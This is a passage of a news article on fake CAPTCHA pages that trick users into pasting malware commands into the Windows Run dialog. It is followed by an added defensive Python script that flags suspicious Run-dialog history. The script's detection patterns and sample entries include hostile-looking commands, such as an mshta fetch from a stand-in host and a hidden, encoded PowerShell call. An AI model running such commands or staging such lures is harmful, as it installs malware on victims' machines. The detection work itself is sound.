The attack begins through compromised websites containing malicious JavaScript. When users interact with these sites, they're redirected to deceptive pages that display error messages or CAPTCHA verifications, urging users to perform actions such as copying and pasting commands into their system's terminal or PowerShell.
“When a victim visits a malicious or compromised site, they see a message ‘Checking if the site connection is secure-Verify you are human’ just as they would on a real Cloudflare page,” Kelley said in a blog post. Subsequently, a pop-up or on-page message directs users through a sequence of key presses – including Win+R, Ctrl+V, and Enter – resulting in execution of the malware on their machine.
“The concept of phishing users with fake security controls is not a new one,” said James Maude, field CTO at BeyondTrust. “In the past, threat actors have had great success with phishing documents that trick users into allowing malicious macros to run using fake security checks that claim the document needs macros enabled for security.”
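The Win+R, Ctrl+V, Enter sequence described above leaves a trace defenders can review: Windows records Run dialog commands per user under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`. The following triage sketch is an added example, not code from the article or the researchers quoted; the rule names, thresholds and sample entries are constructed assumptions.

```python
import re

# Hypothetical triage rules for commands pasted into the Run dialog.
RULES = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)(\.exe)?\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_or_encoded": re.compile(r"(?<!\w)-(enc\w*|e|w\s+h\w*|windowstyle\s+h\w*)\b", re.I),
    # Lure text left in the command so the Run box looks like a verification step.
    "verification_lure": re.compile(r"verify you are human|not a robot|captcha|cloudflare", re.I),
}

def normalize(mru_value):
    """RunMRU stores each command with a trailing '\\1' marker; strip it."""
    return mru_value[:-2] if mru_value.endswith("\\1") else mru_value

def triage(mru_value):
    """Return (suspicious, matched_rule_names) for one RunMRU value."""
    cmd = normalize(mru_value)
    hits = sorted(name for name, rx in RULES.items() if rx.search(cmd))
    # A script host on its own is ordinary admin use; require a second trait.
    return ("script_host" in hits and len(hits) >= 2), hits

def flagged(entries):
    """Names of RunMRU values (a, b, c, ...) whose command looks like the lure."""
    return [name for name, value in entries.items() if triage(value)[0]]

# Constructed sample of one user's RunMRU values (not real telemetry).
SAMPLE = {
    "a": "cmd\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta https://example.test/v # Verify you are human\\1",
    "d": "powershell -w hidden -enc <BASE64-PLACEHOLDER>\\1",
}

if __name__ == "__main__":
    for name, value in SAMPLE.items():
        print(name, *triage(value))
```

Entries flagged this way are leads for review alongside process-creation telemetry, since the key only shows what was typed or pasted into the Run dialog.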